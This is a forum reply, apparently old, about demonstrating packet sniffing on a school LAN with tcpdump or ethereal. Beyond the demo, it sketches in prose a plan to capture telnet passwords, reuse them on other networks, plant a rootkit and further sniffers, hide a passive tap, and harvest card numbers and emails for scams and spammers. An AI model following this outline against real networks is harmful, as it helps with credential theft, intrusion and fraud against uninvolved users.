0
Originally posted by: TJN23
1) Can this be done?
2) Are there VNC / packet sniffing packages available for RedHat (preferably preinstalled on a typical RedHat 8 setup)?
1) sure
2) maybe, tcpdump with some scripts to seperate the vnc packets from the the rest.
For a packet sniffer I prefer
ethereal
It supports many different protocols, so you can screen out the chaff using it. Then it makes it easy to discect the individual packets and examine what part means what and so on.
If you want to demostrat what a packet sniffer can do, the two easiest examples are telnet session and a some http internet browsing.
Set up the sniffer on the lan, then have someone log into on of the machines using telnet and demostrate that each letter pressed, including passwords, get sent to the host then echoed back (passwords don't get echoed back.) Then you have the computer they logged into, were they logged in from, and then what their username is and what is their password is. More then likely they use the same username and password for both machines, and whala! you have access to both networks more then likely with a convenent username. A simple exploit later, root kit, and another sniffer later and then you have the tools to capture Administrative passwords as they telnet around the local networks.
(just for reference, not pertaining to the school lab lan)
Of course it's a lot easier on a ethernet lan. If they use (correctly configured) switches it makes it a bit more difficult, if you are on the internet then you have to have access(control over) to one of the hundred networks and routers the info passes thru to sniff passwords.
It's all about the collision domain. Older ethernet stuff based off of hubs had network wide collision domains so that you could get any packet on any part of the network. With good switch deployments the packets get routed only to each specific machines. Nowadays a hacker would have to run a passive tap (physical attachment in a ethernet line) off a backbone line or a line to a server(or control the server) to be likely to get good passwords and info. A lot more risky because it would require physical access, but a passive tap successfull put into a ceiling or something, or a wireless lan would be hard to detect with anything but dumb luck.
(/done)
You could also demostrate easily how a person could monitor web traffic and gleam passwords, information, and such of off regular http traffic. Could be usefull for intellegence to run social engineering scams. (think: Nobody would know about that webpage on our local intranet, so it would be ok to lend my password to him, poor guy all that work and he lost his password...) Or get credit card numbers, social security numbers, names, usernames, passwords, e-mail addresses for spammers, blah blah blah.
Just remember though that the easiest way to sniff packets its off of a ethernet network were the computers are connected by hubs. If it's switches (used commonly to maximize bandwidth in full duplex mode) it would make it a bit more difficult, depending on how nice they are and how they are configured.
Facebook
Twitter